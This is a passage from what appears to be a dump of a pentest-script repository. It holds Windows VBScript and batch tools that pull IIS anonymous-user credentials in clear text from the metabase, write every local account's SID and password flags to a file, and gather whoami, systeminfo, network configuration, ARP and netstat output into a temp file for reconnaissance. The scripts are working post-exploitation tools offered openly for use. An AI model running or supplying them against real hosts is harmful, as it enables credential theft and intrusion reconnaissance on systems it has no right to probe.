        ServerComment=iis.servercomment
        set IISweb=iis.getobject("IIsWebVirtualDir","Root")
        user=iisweb.AnonymousUserName
        pass=iisweb.AnonymousUserPass   ' clear-text secret from the metabase
        path=IIsWeb.path
        ' "list" is never declared; it is an implicit global accumulating the report.
        list=list&servercomment&" "&user&" "&pass&" "&join(serverBindings,",")&" "&path& vbCrLf & vbCrLf
    end if
Next

wscript.echo list

Set ObjService=Nothing

wscript.echo "from : http://www.xxx.com/" &vbTab&vbCrLf

WScript.Quit
--------------------------------------------------------------------------------
/vbs/ping.vbs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/vbs/ping.vbs
--------------------------------------------------------------------------------
/vbs/windows获得所有本地账户信息/ff.vbs:
--------------------------------------------------------------------------------
' Write every local user account of this host (WMI Win32_UserAccount with
' LocalAccount = True) into testfile.txt in the current directory, one
' attribute per line and a separator line between accounts.
' The file holds account names, SIDs and password/lockout flags, so treat it
' as sensitive inventory data.
On Error Resume Next   ' every failure below is skipped silently: if OpenTextFile
                       ' fails, f stays unset and every WriteLine is ignored
Const ForReading = 1, ForWriting = 2   ' ForReading is declared but never used
Dim fso, f
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile("testfile.txt", ForWriting, True)   ' True: create if missing; existing content is overwritten

strComputer = "."   ' "." = the local machine
Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

' Only local accounts; domain accounts are excluded by the WHERE clause.
Set colItems = objWMIService.ExecQuery _
    ("Select * from Win32_UserAccount Where LocalAccount = True")

For Each objItem in colItems
    f.WriteLine("Account Type: " & objItem.AccountType)
    f.WriteLine("Caption: " & objItem.Caption )
    f.WriteLine("Description: " & objItem.Description )
    f.WriteLine("Disabled: " & objItem.Disabled )
    f.WriteLine("Domain: " & objItem.Domain )
    f.WriteLine("Full Name: " & objItem.FullName )
    f.WriteLine("InstallDate: " & objItem.InstallDate )
    f.WriteLine("Local Account: " & objItem.LocalAccount )
    f.WriteLine("Lockout: " & objItem.Lockout )
    f.WriteLine("Name: " & objItem.Name )
    f.WriteLine("Password Changeable: " & objItem.PasswordChangeable )
    f.WriteLine("Password Expires: " & objItem.PasswordExpires )
    f.WriteLine("Password Required: " & objItem.PasswordRequired )
    f.WriteLine("SID: " & objItem.SID )
    f.WriteLine("SID Type: " & objItem.SIDType )
    f.WriteLine("Status: " & objItem.Status )
    f.WriteLine(" ")   ' separator between accounts (a single space, not an empty line)
Next

f.Close
--------------------------------------------------------------------------------
/vbs/收集系统信息.bat:
--------------------------------------------------------------------------------
@rem Snapshot of current identity, system info, interface config, ARP cache
@rem and socket table, all written into one report file.
@rem c:\windows\temp\cat.txt is created/truncated once and the five outputs
@rem are appended to it in order.
(
  whoami
  systeminfo
  ipconfig /all
  arp -a
  netstat -an
) >c:\windows\temp\cat.txt
--------------------------------------------------------------------------------